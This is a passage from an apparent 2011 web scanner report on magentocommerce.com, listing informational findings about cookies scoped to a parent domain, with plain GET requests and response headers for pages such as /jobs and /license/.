Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.45. http://www.magentocommerce.com/he  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.46. http://www.magentocommerce.com/hu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.47. http://www.magentocommerce.com/imagine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.48. http://www.magentocommerce.com/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.49. http://www.magentocommerce.com/jobs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.50. http://www.magentocommerce.com/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.51. http://www.magentocommerce.com/jobs/p/2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.52. http://www.magentocommerce.com/knowledge-base  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.53. http://www.magentocommerce.com/license/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.54. http://www.magentocommerce.com/license/enterprise-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.55. http://www.magentocommerce.com/lodger-footwear/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.56. http://www.magentocommerce.com/lt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.57. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.58. http://www.magentocommerce.com/maps/online  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.59. http://www.magentocommerce.com/media/interviews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
